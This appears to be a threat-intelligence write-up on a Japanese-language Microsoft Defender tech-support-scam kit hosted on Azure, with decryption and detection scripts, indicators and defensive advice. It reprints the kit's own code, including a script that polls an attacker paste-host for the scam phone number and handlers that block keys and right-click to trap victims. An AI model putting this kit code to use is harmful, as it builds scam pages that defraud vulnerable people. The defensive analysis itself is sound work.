
Three Paste-Hosts, One HMAC Key, and 257 Azure Subdomains — Inside the 'edit_phone_number' Tech-Support-Scam Kit Targeting Japan

A Japanese-language Microsoft Defender impersonation kit fetches its phone number from a paste-host every 6 to 12 seconds. The encrypted body verifies with a 32-character HMAC key the operator hardcoded across every kit instance we have seen.

Published April 25, 2026

Initial lead from a researcher (campaign window 20–26 April 2026). The brief described it as a Japan-targeted tech-support-scam pushing fake Windows-upgrade pages on Azure-hosted URLs, and gave us the lure shape, three Azure landing URLs, and one phone number. The kit forensics, decryption recipe, three-backend rotation pool, and 257-subdomain footprint below are what we found pulling on that thread. If you have prior reporting on the edit_phone_number placeholder pattern, on the a3928be5... HMAC key, or on the paste-host backend realslimshady[.]net, please reach out — we will update and credit.

TL;DR

A Japanese-language tech-support-scam (TSS) kit family is being deployed across hundreds of Azure Storage static website subdomains, lured via emails that spoof microsoft-noreply[@]microsoft[.]com and use the subject 「【重要】Windowsセキュリティーシステムのアップグレード」 ("Important — Windows Security System Upgrade"). The landing pages impersonate Microsoft Defender / Windows Protection Center in fluent Japanese and tell the victim to call a phone number for "technical support."

The kit ships its phishing dialog as an AES-CBC-encrypted blob inside a <div style="display:none"> element, with the decryption key derived from the URL hash fragment and a HMAC-SHA256 verifying integrity. The HMAC key is the same 32 hex characters across every kit instance we have pulled. That single string is the operator-wide fingerprint.

The phone number itself is not in the kit. The kit fetches it from one of three operator-controlled paste-hosting backends every 6 to 12 seconds and substitutes it into the rendered text via a tree-walker. All three backends serve the same 7,546-byte "Secure Text Hosting" homepage from the same custom Go-style backend; one of the three (neconki[.]top) was registered through Spaceship the day before this post went out, suggesting an active rotation cycle as registrar abuse takedowns roll through.

We pulled and decrypted one live landing, mapped the rotation architecture, and counted 257 unique *.web.core.windows.net subdomains observed in public scan corpora — almost certainly an undercount, since urlscan only sees what people submit. Microsoft has already taken down most observed Azure landings. At least one live page remained at the time of writing.

Item | Value
Lure | Microsoft Defender impersonation, Japanese (lang=ja-JP)
Spoofed sender | microsoft-noreply[@]microsoft[.]com
Kit cipher | AES-256-CBC, PKCS7, key from URL hash fragment, HMAC-SHA256 verified
Hardcoded HMAC key | a3928be5f5b6af086ad652a2fed39623
Phone-fetch endpoint | /<key> on realslimshady[.]net / abrakadabra[.]it[.]com / neconki[.]top
Phone observed (rotates) | (0101) 47881-27410 (was (0101) 20836-17998 two days prior)
Audio asset | morning-alarm.mp3, SHA-256 2250b1...c26b06bc
Azure subdomains observed | 257 unique, across ≥25 z-zones
Direct-host backend | 5.182.87[.]132 (AS210644 Aeza Frankfurt per RIPE whois April 2026; US Treasury OFAC sanctioned July 2025)

What This Report Adds to the Public Record

  • The exact decryption recipe for the encrypted-body kit: AES-256-CBC with the URL-hash fragment as the key (NULL-padded to 32 bytes, Latin-1), and a hardcoded HMAC-SHA256 key a3928be5f5b6af086ad652a2fed39623 that allows operator-wide YARA-grade fingerprinting.
  • The decrypted plaintext (SHA-256 2589a5...0832cd5), pulled live from a still-up Azure landing on 2026-04-25, including the full Japanese-language Microsoft Defender impersonation copy and the anti-detection padding (random Wikipedia-style filler paragraphs hidden offscreen with zero-width-joiner homoglyph obfuscation).
  • The phone-number rotation architecture — a JavaScript tree-walker that fetches /<key> from a paste-host every 6 to 12 seconds and substitutes the response into the rendered DOM, allowing the operator to change phone numbers globally without redeploying any of the hundreds of phishing pages.
  • The three-backend rotation pool: realslimshady[.]net (direct on Aeza), abrakadabra[.]it[.]com (Cloudflare-fronted), and neconki[.]top (Cloudflare-fronted, registered through Spaceship on 2026-04-24 — the day before this post). All three serve the same custom "Secure Text Hosting" software, identical 7,546-byte homepage hash, identical /api middleware response, identical /<key> content. One operator, three redundant fronts.
  • A 257-host dedup of Azure Storage static website subdomains (*.web.core.windows.net, the $web blob-container feature — note this is not Azure Static Web Apps, which uses *.azurestaticapps.net; the z<NN> storage-account zone in the hostname is the giveaway) referencing one of the three backends, with the heaviest deployment in z1 (44 subdomains) and a long tail across 24 distinct storage zones.
  • Operator-side tells: the homepage auto-generates a sales@<hostname> mailto link by reading location.hostname at runtime, which suggests the paste-host software is being marketed (or self-served) as a product. The same 7,546-byte page renders on every backend regardless of domain.

This report does not assign a tracker name to the operator. The 20–26 April 2026 window aligns with the researcher's coverage of the same Japan-targeted Windows-upgrade tech-support scam on Azure-hosted URLs; tracker-level attribution is left to the broader research community.


The Lure

Emails arrive with a spoofed From: microsoft-noreply[@]microsoft[.]com header and the same Japanese subject line shown above. The body links to a randomly named Azure Storage static website subdomain; examples seen include rudecutug[.]z28[.]web[.]core[.]windows[.]net, rufawowop[.]z1[.]web[.]core[.]windows[.]net, tunibicat[.]z12[.]web[.]core[.]windows[.]net, and liwolapu[.]z36[.]web[.]core[.]windows[.]net.

The subdomain naming is operator-generated pseudo-Latin words — six to ten characters of consonant-vowel pattern (liwolapu, betotifi, migivivowo, cusowezin). They look like nothing in particular, which is the point.

The first hop is a 1,877-byte mobile-detection page. On a phone or tablet it shows 「PCからアクセスしてください」 ("Please access from PC"). On a desktop it calls location.replace() into the encrypted kit at a longer pseudo-random filename such as /jh1rhvn3e7xs.html#t35IRPK02FGIBIkQ. The URL fragment after # is the AES key; without that fragment, the kit sets location.href to about:blank. Anyone landing on the kit URL without the fragment, including most automated scanners, sees nothing.


The Kit — AES-CBC with the URL Hash as Key

The kit page is 52,525 bytes. Almost all of it is one base64-encoded blob inside a hidden <div>:

<div id="9t9jtf7" style="display:none;">I5GE08Xt6tCOBKD1Bq44mX04CJcH9wPD4saa8aYqpVGUs+8W9Pj88vT9...</div>

A 1,127-character inline script does the unwrap:

(function(){
  var k5zg20 = document.getElementById("9t9jtf7").innerHTML,
      bb8j6n = location.hash.slice(1);
  if (!bb8j6n) { location.href = "about:blank"; return }
  history.replaceState(null, null, location.pathname);
  for (var wkri6 = bb8j6n; wkri6.length < 32;) wkri6 += String.fromCharCode(0);
  wkri6 = wkri6.slice(0, 32);
  var hmwy = CryptoJS.enc.Latin1.parse(wkri6),
      cx994f6 = CryptoJS.enc.Latin1.parse("a3928be5f5b6af086ad652a2fed39623"),
      nbiwcn = CryptoJS.enc.Base64.parse(k5zg20),
      wre2z9g = nbiwcn.sigBytes,
      y9gp4kc = CryptoJS.lib.WordArray.create(nbiwcn.words.slice(0, 4), 16),
      lp0vzu  = CryptoJS.lib.WordArray.create(nbiwcn.words.slice(4, (wre2z9g - 32) / 4), wre2z9g - 48),
      hj9v    = CryptoJS.lib.WordArray.create(nbiwcn.words.slice((wre2z9g - 32) / 4), 32);
  if (CryptoJS.enc.Hex.stringify(hj9v) ===
      CryptoJS.enc.Hex.stringify(CryptoJS.HmacSHA256(y9gp4kc.concat(lp0vzu), cx994f6))) {
    try {
      var wv71 = CryptoJS.AES.decrypt({ciphertext: lp0vzu}, hmwy,
        {iv: y9gp4kc, mode: CryptoJS.mode.CBC, padding: CryptoJS.pad.Pkcs7})
        .toString(CryptoJS.enc.Utf8);
      wv71 ? (document.open(), document.write(wv71), document.close())
           : location.href = "about:blank";
    } catch (ktph6) { location.href = "about:blank" }
  } else { location.href = "about:blank" }
})()

The blob layout is IV(16 bytes) ‖ ciphertext(N) ‖ HMAC(32 bytes), base64-encoded. The decrypt side keys AES-256-CBC with the URL hash NULL-padded to 32 bytes. Before decrypting, the script verifies HMAC-SHA256 over IV ‖ ciphertext with a hardcoded second key — a3928be5f5b6af086ad652a2fed39623 — which is also 32 ASCII characters parsed as Latin-1 bytes.

That second key is the operator's mistake. Instead of deriving it from the URL fragment too, or rotating it per deploy, they hardcoded one value into the kit builder. Every page we have pulled from this builder embeds that exact string. A grep for a3928be5f5b6af086ad652a2fed39623 across any HTML corpus that includes the inline JS will find every other deployment.

We tested both Shodan (http.html:) and urlscan (page.text:) for that key. Both returned zero hits — Shodan does not crawl Azure Storage static website content because the per-tenant pages are not reachable at the IP layer they enumerate, and urlscan indexes rendered visible text rather than JS source. Other corpora (Censys raw HTML, GitHub code search, the Google index) did not surface it either. The pivot is real but it needs an HTML-source corpus that includes the inline script. urlscan submission text-search via the paste-host references gave the operator-wide map by proxy.

A drop-in Python decrypter, given the kit HTML and the URL hash, looks like this:

import base64, hashlib, hmac, re
from Crypto.Cipher import AES           # pycryptodome
from Crypto.Util.Padding import unpad

HMAC_KEY = b"a3928be5f5b6af086ad652a2fed39623"   # hardcoded in every kit instance pulled so far

def decrypt_kit(html: str, url_hash: str) -> bytes:
    m = re.search(r'<div id="[^"]+" style="display:none;">([A-Za-z0-9+/=]+)</div>', html)
    if not m:
        raise ValueError("no hidden base64 body found")
    raw = base64.b64decode(m.group(1))
    if len(raw) < 16 + 32:
        raise ValueError("blob too short for IV + HMAC")
    iv, ct, mac = raw[:16], raw[16:-32], raw[-32:]     # IV(16) ‖ ciphertext ‖ HMAC-SHA256(32)
    if not hmac.compare_digest(mac, hmac.new(HMAC_KEY, iv + ct, hashlib.sha256).digest()):
        raise ValueError("HMAC mismatch")
    # CryptoJS Latin1.parse of the fragment, NULL-padded or truncated to 32 bytes -> AES-256 key
    key = (url_hash.encode("latin-1") + b"\x00" * 32)[:32]
    return unpad(AES.new(key, AES.MODE_CBC, iv).decrypt(ct), 16, "pkcs7")

Run that against a captured kit HTML with the right URL fragment and you get the rendered Japanese phishing page in plaintext. The HMAC verification fails fast on tampered or partial captures, so the function is also a reasonable kit-detector.


The Decrypted Phishing Page

The plaintext (37,229 bytes, SHA-256 2589a5...0832cd5) is a textbook Microsoft Defender impersonation done in fluent Japanese. The rendered visible content boils down to:

  • A fake scan progress sequence: 「ライセンスの検証処理」, 「シグネチャの照合中」, 「RAM使用量の分析」, 「ブート項目の検査」, 「システム変数の検証」, 「ディスク領域の検証中」.
  • A red 「緊急脅威アラート」 ("Emergency Threat Alert") panel claiming the device has been hijacked by ransomware and that authentication tokens, financial logins, social-media credentials, and saved documents have been "compromised."
  • A persistent CTA: 「今すぐテクニカルサポートにお電話ください」 ("Call technical support immediately") followed by the placeholder text edit_phone_number, which the rotation script replaces with the live phone number on a 6-to-12-second loop.
  • Brand strings rotated through the page: 「PC防御センター」, 「Windows保護センター」, 「Defender 脅威防御センター」.

The page autoplays fragments/morning-alarm.mp3 (173,974 bytes, 22.05 kHz mono, MPEG ADTS layer-3 v2 56 kbps) on load — a continuous siren-like tone designed to add urgency. It also sets cursor: none on <body> and disables both the right-click context menu and keydown events:

document.addEventListener("contextmenu", function(e){e.preventDefault(); return false});
document.onkeydown = function(e){return false};

The cursor-hide and key-disable combination is a recurring TSS pattern designed to make the victim feel trapped on the page and reach for the phone. It is not a technical lock — Alt-F4 still works, browser-tab-close still works — but for a less-technical Japanese-speaking target, particularly an older one, the pattern is effective.

The Anti-Detection Padding

Interspersed throughout the decrypted page are short Wikipedia-style paragraphs about unrelated topics: "Fast Fashion Rise," "Canvas Stretching Method," "Grafting Fruit Trees," "Wetland Water Filtration," "Walking Tour Navigation," "Great Wall Construction," "Ethics of Care," "Art Deco Geometric Patterns," "Panopticon Metaphor," "Dwarf Planet Definition," "Natural Light Direction." Each is a few sentences of plausible encyclopedic prose. Each is hidden offscreen with position:absolute;transform:translateX(-10000px);width:1px;height:1px;overflow:hidden.

Both the Japanese phishing copy and the English decoy paragraphs are obfuscated with zero-width Unicode joiners (U+200C, U+200D, U+FEFF) inserted between characters. Fast Fash​ion Rise is rendered identically to Fast Fashion Rise in a browser but differs at the byte level — a basic but useful trick against naive substring scanners.

The decoy paragraph list is a solid YARA-grade fingerprint on its own: any one of those phrase combinations in offscreen padding is enough to flag a kit instance.
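As an added example (not the report's own tooling), a static triage pass over captured HTML that applies the fingerprints from this section and from the hardcoded-HMAC-key discussion above: it strips the zero-width padding, counts decoy titles only inside translateX(-10000px) blocks, and classifies a capture as encrypted wrapper or decrypted kit page. The sample HTML is constructed, and stripping U+200B alongside the three code points the report names is an assumption.

```python
import re

# Hardcoded HMAC key and placeholder quoted from the report; decoy titles and brand
# strings are the ones listed in the report's fingerprint section.
HMAC_KEY = "a3928be5f5b6af086ad652a2fed39623"
PLACEHOLDER = "edit_phone_number"
BRAND_STRINGS = ("PC防御センター", "Windows保護センター", "Defender 脅威防御センター")
DECOY_PHRASES = (
    "Fast Fashion Rise", "Canvas Stretching Method", "Grafting Fruit Trees",
    "Wetland Water Filtration", "Walking Tour Navigation", "Great Wall Construction",
    "Ethics of Care", "Art Deco Geometric Patterns", "Panopticon Metaphor",
    "Dwarf Planet Definition", "Natural Light Direction",
)
# Zero-width code points stripped before matching. The report lists U+200C, U+200D and
# U+FEFF; U+200B is added here as an assumption because it renders identically.
ZERO_WIDTH = dict.fromkeys(map(ord, "\u200b\u200c\u200d\ufeff"), None)

# Hidden <div> carrying the base64 body of an encrypted (not yet decrypted) kit capture.
HIDDEN_BLOB_RE = re.compile(r'<div id="[^"]+" style="display:none;">([A-Za-z0-9+/=]{64,})</div>')
# Elements pushed offscreen the way the kit hides its decoy paragraphs.
OFFSCREEN_RE = re.compile(r'<[^>]*style="[^"]*translateX\(-10000px\)[^"]*"[^>]*>(.*?)</', re.S)


def strip_zero_width(text: str) -> str:
    """Undo the homoglyph padding so 'Fast Fash<ZWJ>ion Rise' matches 'Fast Fashion Rise'."""
    return text.translate(ZERO_WIDTH)


def triage_kit_html(html: str) -> dict:
    """Classify one captured HTML source as encrypted wrapper, decrypted kit page, or no match."""
    clean = strip_zero_width(html)
    offscreen_text = " ".join(OFFSCREEN_RE.findall(clean))
    findings = {
        "hmac_key": HMAC_KEY in html,
        "hidden_blob": HIDDEN_BLOB_RE.search(html) is not None,
        "placeholder": PLACEHOLDER in clean,
        "brands": [b for b in BRAND_STRINGS if b in clean],
        # Only decoys inside offscreen blocks count: a visible encyclopedia article is not a hit.
        "decoys": [p for p in DECOY_PHRASES if p in offscreen_text],
    }
    if findings["hmac_key"] and findings["hidden_blob"]:
        findings["verdict"] = "encrypted-kit-wrapper"
    elif len(findings["decoys"]) >= 3 or (findings["placeholder"] and findings["brands"]):
        findings["verdict"] = "decrypted-kit-page"
    else:
        findings["verdict"] = "no-match"
    return findings


# Constructed samples (not captures from the campaign).
OFFSCREEN = 'style="position:absolute;transform:translateX(-10000px);width:1px;height:1px;overflow:hidden"'
ZW = "\u200c"
SAMPLE_WRAPPER = (
    '<html><body><div id="9t9jtf7" style="display:none;">' + "QUJD" * 24 + "</div>"
    '<script>var k = CryptoJS.enc.Latin1.parse("' + HMAC_KEY + '");</script></body></html>'
)
SAMPLE_PLAINTEXT = (
    "<html><head><title>報告 [U0001]</title></head><body>"
    "<h1>Windows" + ZW + "保護センター</h1>"
    "<p>今すぐテクニカルサポートにお電話ください edit_phone_number</p>"
    "<p>Ethics of Care is visible text here and must not count as padding.</p>"
    "<div " + OFFSCREEN + ">Fast Fash" + ZW + "ion Rise grew with cheap global logistics.</div>"
    "<div " + OFFSCREEN + ">Canvas Stre" + ZW + "tching Method keeps linen under even tension.</div>"
    "<div " + OFFSCREEN + ">The Pan" + ZW + "opticon Metaphor recurs in surveillance studies.</div>"
    "</body></html>"
)
SAMPLE_BENIGN = "<html><body><p>Fast Fashion Rise: an encyclopedia article.</p></body></html>"

if __name__ == "__main__":
    for name, html in (("wrapper", SAMPLE_WRAPPER), ("plaintext", SAMPLE_PLAINTEXT), ("benign", SAMPLE_BENIGN)):
        print(name, triage_kit_html(html)["verdict"])
```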


The Phone-Number Rotation

The kit's rotation script, also inline at the bottom of every page, is small:

(function(){
  var U = "https://realslimshady.net/jpmaclaud",
      K = "edit_phone_number";
  function run(){
    fetch(U, {cache:"no-store"})
      .then(function(r){return r.text()})
      .then(function(v){
        v = v.trim();
        if (!v) return;
        var tw = document.createTreeWalker(document.body, NodeFilter.SHOW_TEXT);
        while (tw.nextNode())
          if (tw.currentNode.nodeValue.includes(K))
            tw.currentNode.nodeValue = tw.currentNode.nodeValue.replaceAll(K, v);
      });
  }
  run();
  setInterval(run, Math.floor(Math.random() * 6001) + 6000);
})();

It fetches realslimshady[.]net/jpmaclaud once on load, then again every 6 to 12 seconds (Math.random()*6001 + 6000 ms). Each response is a short text string — currently (0101) 47881-27410. The walker substitutes edit_phone_number into the rendered DOM with whatever the paste-host returns.

Note: that displayed number is not a valid Japanese phone format. Real Japanese numbers begin with 0 plus an actual area code (03 Tokyo, 06 Osaka, 045 Yokohama, or 090/080/070 for mobile) and run 9–11 digits. (0101) 47881-27410 is 14 digits with a non-existent 0101 prefix. It is most likely either a VoIP/forwarding number routed through a foreign carrier, or a deliberately weird display string the kit uses purely for visual urgency rather than for the click-to-call to actually dial. We did not call it.

That design lets the operator change phone numbers on the fly without touching a single Azure deployment. We watched the same key /jpmaclaud for two days and saw the number change from (0101) 20836-17998 (per the researcher's brief from 2026-04-23) to (0101) 47881-27410 (today). The operator updated the paste once; every one of the hundreds of live kits picked up the new number on its next 6-second tick.
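The polling cadence and tiny text/plain responses described above are a detectable pattern in egress proxy logs. This added example (not the kit's or the report's code) groups requests to the three backends per client and flags trains spaced 6 to 12 seconds apart; the log format and the sample lines are constructed.

```python
from collections import defaultdict
from datetime import datetime
from statistics import median

# Paste-host backends named in the report (undefanged here so they match log hostnames).
ROTATION_BACKENDS = {"realslimshady.net", "abrakadabra.it.com", "neconki.top"}
MIN_GAP_S, MAX_GAP_S = 6.0, 12.0   # setInterval(run, Math.random()*6001 + 6000) in the kit
MAX_BODY_BYTES = 25                # "(0101) 47881-27410" is 18 bytes; the report's threshold is 25
MIN_POLLS = 3                      # one fetch could be an analyst; a polling train is the kit
GAP_TOLERANCE = 1                  # out-of-range gaps tolerated (e.g. one dropped log line)

# Constructed proxy log (assumed format): timestamp, client, method, host, path, status,
# content-type, response bytes. The first client polls like a kit; the second does not.
SAMPLE_LOG = """\
2026-04-25T09:00:00Z 10.1.2.3 GET realslimshady.net /jpmaclaud 200 text/plain 18
2026-04-25T09:00:07Z 10.1.2.3 GET realslimshady.net /jpmaclaud 200 text/plain 18
2026-04-25T09:00:18Z 10.1.2.3 GET realslimshady.net /jpmaclaud 200 text/plain 18
2026-04-25T09:00:26Z 10.1.2.3 GET realslimshady.net /jpmaclaud 200 text/plain 18
2026-04-25T09:00:01Z 10.1.2.9 GET example.com /index.html 200 text/html 5123
2026-04-25T09:00:02Z 10.1.2.9 GET neconki.top / 200 text/html 7546
2026-04-25T09:05:00Z 10.1.2.9 GET neconki.top /jpmaclaud 200 text/plain 18
"""


def parse_line(line: str) -> dict:
    ts, client, method, host, path, status, ctype, size = line.split()
    return {"ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), "client": client,
            "method": method, "host": host, "path": path, "status": int(status),
            "ctype": ctype, "size": int(size)}


def is_paste_pull(rec: dict) -> bool:
    """One request shaped like the kit's /<key> fetch: tiny text/plain from a rotation backend."""
    return (rec["host"] in ROTATION_BACKENDS and rec["method"] == "GET"
            and rec["path"] not in ("/", "") and not rec["path"].startswith("/api")
            and rec["ctype"].startswith("text/plain") and rec["size"] < MAX_BODY_BYTES)


def find_rotation_polls(log_text: str) -> list:
    """Group candidate pulls per (client, host, path); keep trains with kit-like 6-12 s spacing."""
    trains = defaultdict(list)
    for line in log_text.splitlines():
        if line.strip():
            rec = parse_line(line)
            if is_paste_pull(rec):
                trains[(rec["client"], rec["host"], rec["path"])].append(rec["ts"])
    hits = []
    for (client, host, path), stamps in trains.items():
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        bad = sum(1 for g in gaps if not MIN_GAP_S <= g <= MAX_GAP_S)
        if len(stamps) >= MIN_POLLS and bad <= GAP_TOLERANCE:
            hits.append({"client": client, "host": host, "path": path,
                         "polls": len(stamps), "median_gap_s": median(gaps)})
    return hits


if __name__ == "__main__":
    for hit in find_rotation_polls(SAMPLE_LOG):
        print(hit)
```

A single hit from a backend (the second client above) is worth a low-priority alert on its own, since the report's guidance is to block the three domains outright.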


The Three Paste-Host Backends

realslimshady[.]net is one of three operator-controlled paste-hosts in active rotation. The TSS-kit JavaScript currently embeds realslimshady[.]net as the primary backend, but the lure infrastructure also references abrakadabra[.]it[.]com and a third backend, neconki[.]top, that was registered the day before this post.

All three serve the same 7,546-byte "Secure Text Hosting" homepage. Same DOM hash. Same CSS. Same dynamic sales@<hostname> mailto link generated client-side from location.hostname. Same /api/* middleware that returns {"error":"missing authorization header"} (HTTP 401, 41 bytes) for every path before routing — /api, /api/list, /api/all, /api/keys, /api/auth, /api/login all return identically. Same Allow: GET 405 response for POST/PUT/PATCH to /<key>. Same nginx-1.18.0-on-Ubuntu front. Same X-Ratelimit-Limit: 200 per ~2-hour window.

Backend | Hosting | First seen | Status
realslimshady[.]net | Direct on 5.182.87[.]132 (AS210644 Aeza Frankfurt per RIPE whois April 2026) | older | live, port 80 only
abrakadabra[.]it[.]com | Cloudflare-fronted (anycast 104.21.0[.]0/20 + 172.67.0[.]0/16; resolved IPs vary by vantage point) | older | live
neconki[.]top | Cloudflare-fronted (anycast 188.114.96[.]0/22) | registered 2026-04-24 via Spaceship | live, fresh rotation

5.182.87[.]132 is on AS210644 (per RIPE whois April 2026) — the same Aeza network that the US Treasury OFAC sanctioned on July 1, 2025 for hosting commodity malware infrastructure. Silent Push reported Aeza migrating IPs from AS210644 to AS211522 (Hypercore LTD) starting July 2025; this specific host has not yet moved, but the announcement may shift, so confirm via current BGP if you're using the ASN as an indicator. Aeza's reputation as a takedown-unresponsive host makes it the natural anchor for the operator's redundancy: even when Cloudflare suspends abrakadabra[.]it[.]com or neconki[.]top, the Aeza-hosted realslimshady[.]net stays up, the kits still fetch their phone numbers, and the campaign continues uninterrupted while the operator registers the next Cloudflare-fronted front.

The neconki[.]top registration on 2026-04-24 — through Spaceship, a registrar that has emerged in 2025-2026 as a low-friction alternative to Namecheap — is the most operationally useful tell in this set. It says the operator is still actively iterating, registering new fronts as the older ones get reported. A Spaceship abuse complaint against neconki[.]top, filed alongside the Cloudflare phishing report, is the right move.

The "Secure Text Hosting" Software

The operator did not write this paste-host software for this campaign. The product nature — auto-generated sales@<hostname> from location.hostname, identical 7,546-byte homepage on every domain, structured /api/* middleware with rate limiting and proper security headers (HSTS, X-Frame-Options: DENY, X-Content-Type-Options: nosniff, Vary: Origin), and a robots.txt that does User-agent: * Disallow: / — reads like a SaaS or open-sourced product marketed to anyone running a paste service.

We could not find the software's name or source via Shodan title search, urlscan title search, or GitHub code search for the unique inline-JS strings. The Secure Text Hosting title-search on urlscan returns 39 page captures, but only across two domains: realslimshady[.]net and neconki[.]top. (Cloudflare-fronted scans of abrakadabra[.]it[.]com register against the front, not the title.) The single Shodan host with that title is 5.182.87[.]132 — the same Aeza host. Either the software is rare and operator-developed for personal SaaS use, or it ships under a different brand name that does not include "Secure Text Hosting" in the page title by default.

Either way, the operator is running it identically on three domains and rotating new ones in. Defenders should treat the page-title string Secure Text Hosting plus the 7,546-byte homepage hash as a high-confidence indicator of an operator-controlled paste-rotation backend, regardless of the domain it is served from.


The Azure Footprint — 257 Subdomains

urlscan public submissions referencing one of the three paste-host backends total 5,183 over recent weeks (3,028 for realslimshady[.]net, 2,078 for abrakadabra[.]it[.]com, and 77 for neconki[.]top in the <24 hours since registration). Deduplicated to unique Azure Storage static website subdomains (the $web blob-container feature on *.web.core.windows.net), that resolves to 257 distinct hosts.

The z-zone distribution matches Azure storage account placement across regions (exact counts from the dedup):

Storage zone | Subdomains | Storage zone | Subdomains
z1  | 44 | z6  | 9
z12 | 16 | z22 | 9
z36 | 16 | z38 | 9
z16 | 12 | z4  | 8
z13 | 11 | z27 | 8
z5  | 10 | z31 | 8
z9  | 10 | z43 | 8
z14 | 10 | z11 | 7
z20 | 10 | z19 | 7
z33 | 10 | z21 | 7
z7  | 9  | z23 | 7
z28 | 5  | z32 | 7

z1 is the default Azure Storage static website suffix and the operator's heaviest deployment zone, but the campaign reaches across 24 distinct zones. That suggests the operator is provisioning storage accounts across multiple Azure regions and subscriptions to spread takedown risk.

The 257 figure is almost certainly an undercount. urlscan only sees what humans (and a handful of automated submitters) report; the kit-page subdomains the operator generated but never had submitted to urlscan are invisible to this pivot. The actual operator footprint could comfortably be five times larger.

By the time of writing, three of the four Azure landings named in the original researcher's brief had already been removed (rudecutug[.]z28, rufawowop[.]z1, tunibicat[.]z12). The fourth (liwolapu[.]z36) remained live, and a random-sample fetch of betotifi[.]z21[.]web[.]core[.]windows[.]net from our 257-host list confirmed the same kit pattern was still serving — including the same encrypted body sha256 — on a subdomain Microsoft had not yet seen.


What Defenders Can Do

For operators of mail gateways and DNS sinkholes:

  • Block traffic to realslimshady[.]net, abrakadabra[.]it[.]com, neconki[.]top. The kit cannot rotate its phone number without one of these reachable.
  • Watch for, and block at the egress layer, any outbound HTTP request whose path is /<key> returning under 25 bytes of text/plain from one of those three domains; the rotation pull pattern is distinctive.
  • Sinkhole or block freshly-registered domains that match [a-z]{6,12}\.(top|cc|online|it\.com|net) and whose DNS resolves to Cloudflare or to AS210644 Aeza, when they appear in mail content alongside an Azure Storage static website URL.

For Azure tenants and incident responders:

  • Do not assume *.web.core.windows.net traffic is always benign. The operator is using stock Azure Storage static website endpoints to host the kit, with no custom domain in front. The Server: ECAcc (...) HTTP response signature and the lack of branded redirect mean network-level inspection has to look at the request body, not just the host.
  • Microsoft accepts abuse reports at abuse@microsoft.com and msrc@microsoft.com. Because the operator uses many storage accounts, the highest-leverage ask is for Microsoft to query their own usage records for storage accounts whose public web endpoint references any of the three paste-hosts and suspend them in bulk.

For analysts triaging similar TSS samples:

  • If the kit page title is 報告 [U####], with brand strings PC防御センター, Windows保護センター, or Defender 脅威防御センター, and you see a hidden <div> with a long base64 blob plus inline CryptoJS.HmacSHA256 references, run the decryption recipe above with the URL fragment as the AES key and a3928be5f5b6af086ad652a2fed39623 as the HMAC key. If HMAC verifies, you are looking at a sibling kit instance.
  • The decoy paragraph list ("Fast Fashion Rise," "Canvas Stretching Method," etc.) is a strong fingerprint on its own. A YARA rule that matches three or more of those phrases inside style="...translateX(-10000px)..." blocks will catch the kit family even if the operator rotates the HMAC key in a future build.

Indicators

Hosts and domains (defanged)

Type | Value | Role
IP | 5.182.87[.]132 | Aeza Frankfurt, direct host for realslimshady[.]net (AS210644 per RIPE whois April 2026; US OFAC sanctioned July 2025)
Domain | realslimshady[.]net | Paste-host backend, direct on Aeza
Domain | abrakadabra[.]it[.]com | Paste-host backend, Cloudflare-fronted
Domain | neconki[.]top | Paste-host backend, Cloudflare-fronted, registered 2026-04-24 via Spaceship
URL | hxxps://realslimshady[.]net/jpmaclaud | Phone-number paste, primary fetch in current kit JS
URL | hxxps://abrakadabra[.]it[.]com/jpmaclaud | Phone-number paste, alternate backend
URL | hxxps://neconki[.]top/jpmaclaud | Phone-number paste, fresh backend
Phone | (0101) 20836-17998 | Phone shown to victims 2026-04-23 (per researcher)
Phone | (0101) 47881-27410 | Phone shown to victims 2026-04-25

Azure landings (defanged, examples — 257 total observed)

liwolapu[.]z36[.]web[.]core[.]windows[.]net    (live as of 2026-04-25)
betotifi[.]z21[.]web[.]core[.]windows[.]net    (live as of 2026-04-25, sample-confirmed)
rudecutug[.]z28[.]web[.]core[.]windows[.]net   (taken down)
rufawowop[.]z1[.]web[.]core[.]windows[.]net    (taken down)
tunibicat[.]z12[.]web[.]core[.]windows[.]net   (taken down)

Reach out if you want the full deduped 257-host list.

Hashes

Artifact | SHA-256
Encrypted kit page (liwolapu/jh1rhvn3e7xs.html) | b497e0bf25a301827ac91960ee620c83c2ac1f9a1866ebcc28d00999b8793dc1
Decrypted plaintext | 2589a5798738592a7f4ff775dab892e79c3b5c50fe549bc60bc376c4b0832cd5
morning-alarm.mp3 audio asset | 2250b12957834d0e9f3ab6e7b296b9b25b6d0a292ffdd22fcf4b5842c26b06bc
Mobile-detect landing (liwolapu//) | ac91aa6705e591be9feacdb05e7f6c16d35bcbc1be042e44e70143be8382d44c

Email lure

From:    microsoft-noreply[@]microsoft[.]com  (spoofed)
Subject: 【重要】Windowsセキュリティーシステムのアップグレード

Kit fingerprint strings

a3928be5f5b6af086ad652a2fed39623   (hardcoded HMAC key)
edit_phone_number                  (placeholder for live phone substitution)
viewParams = 'edit_phone_number'   (kit boot script variable)
報告 [U####]                       (page title format)
PC防御センター                       (brand impersonation string)
Windows保護センター                  (brand impersonation string)
Defender 脅威防御センター             (brand impersonation string)
fragments/morning-alarm.mp3        (autoplay audio path)

Decoy padding phrases (any three or more co-occurring inside transform:translateX(-10000px) blocks is a high-confidence kit indicator):

Fast Fashion Rise         Canvas Stretching Method      Grafting Fruit Trees
Wetland Water Filtration  Walking Tour Navigation       Great Wall Construction
Ethics of Care            Art Deco Geometric Patterns   Panopticon Metaphor
Dwarf Planet Definition   Natural Light Direction

Closing Notes

The interesting thing about this kit is not the fake Defender page — those are commodity. It is the architectural choice to put the phone number behind a 6-second-polled paste-host so it can be rotated without redeploying any of the actual phishing pages. A defender who blocks the visible Azure landing buys five minutes of relief; a defender who blocks the paste-host kills the entire campaign at once.

The hardcoded HMAC key is the operator's biggest mistake. The decoy-paragraph reuse is the second. Either one is enough to write a YARA rule that catches sibling deployments. Both together make this kit family trivially trackable across whatever Azure subdomains the operator stands up next.

If you have a corpus that includes raw HTML source — Censys, an internal scanner archive, or a YARA-on-the-pipe setup — and you want to confirm or extend the 257-subdomain count, the inline-JS string a3928be5f5b6af086ad652a2fed39623 is the right starting point. Reply or DM if you find more sibling deployments, sibling paste-host backends, or — particularly — the source for the "Secure Text Hosting" software that this operator is running on three domains.

Breakglass Intelligence — "One indicator. Total infrastructure."

Initial lead courtesy of a researcher (campaign window 20–26 April 2026).
